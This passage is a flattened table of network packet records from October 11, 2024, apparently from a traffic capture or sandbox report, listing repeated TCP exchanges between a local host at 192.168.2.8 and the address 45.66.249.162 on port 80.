                                                                                                                                                              Oct 11, 2024 22:32:41.640049934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640060902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640083075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640091896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640115023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640124083 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640149117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640157938 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640182018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640193939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640214920 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640223980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640256882 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640265942 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640290022 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640297890 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640324116 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640331984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640357018 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640367985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640393019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640399933 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640427113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640434980 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640463114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640467882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640496016 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640502930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640530109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640541077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640562057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640571117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640595913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640604973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640629053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640638113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640662909 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640670061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640695095 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640701056 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640728951 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640737057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640760899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640768051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640794039 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640804052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640826941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640836000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640861988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640868902 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640894890 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640902996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640928984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640938044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.640969992 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.640974998 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641004086 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641011953 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641036034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641046047 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641069889 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641077042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641107082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641113043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641140938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641149044 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641172886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641182899 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641206980 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641213894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641238928 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641247034 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641272068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641277075 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641304970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641311884 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641338110 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641345978 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641371965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641380072 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641406059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641412973 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641441107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641443014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641474009 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641505003 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641506910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641515017 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641544104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641550064 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641577005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641585112 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641611099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641616106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641644001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641654968 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641678095 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641683102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641719103 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.641863108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.641905069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647610903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647643089 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647663116 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647691011 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647695065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647744894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647746086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647778988 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647806883 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647810936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647821903 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647850990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647861958 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647878885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647897005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647912025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647917986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647943020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.647947073 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647984028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.647995949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648026943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648039103 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648061037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648071051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648092985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648107052 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648135900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648143053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648174047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648186922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648205042 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648215055 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648235083 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648245096 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648274899 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648288965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648320913 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648329020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648354053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648363113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648397923 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648406982 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648447990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648456097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648489952 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648499012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648523092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648535013 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648567915 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648574114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648607969 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648618937 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648641109 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648647070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648679972 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648689985 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648722887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648749113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648755074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648766041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648802042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648806095 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648838043 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648849010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648870945 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648880959 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648900032 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648938894 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648948908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.648952007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.648984909 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649000883 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649034023 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649044037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649079084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649085045 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649125099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649133921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649167061 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649175882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649199963 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649208069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649233103 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649239063 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649272919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649282932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649332047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649338961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649363041 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649374962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649395943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649403095 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649437904 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649446011 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649481058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649487972 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649514914 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649522066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649547100 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649557114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649589062 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649594069 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649622917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649635077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649656057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649672985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649692059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649696112 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649734974 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649740934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649774075 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649784088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649806976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649820089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649852991 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649884939 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649903059 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649915934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649930954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649933100 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649945021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649947882 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649959087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649966955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649967909 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649975061 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.649985075 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.649986029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650018930 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650032043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650038004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650072098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650080919 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650105000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650114059 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650137901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650146961 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650177002 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650192976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650233984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650331974 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650382042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650383949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650415897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650425911 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650449038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650459051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650482893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650497913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650518894 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650523901 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650551081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650557995 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650583029 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650593042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650615931 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650624990 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650651932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650657892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650684118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650691986 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650717020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650729895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650753021 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650762081 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650785923 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650787115 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650814056 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650834084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650847912 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650857925 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650882006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650891066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650913954 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650928020 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650948048 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650954962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.650979996 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.650990963 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651012897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651020050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651048899 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651056051 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651087046 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651089907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651118994 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651134014 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651151896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651170969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651184082 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651201010 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651216984 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651232004 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651249886 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651254892 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651283026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:41.651292086 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:41.651315928 CEST804970745.66.249.162192.168.2.8
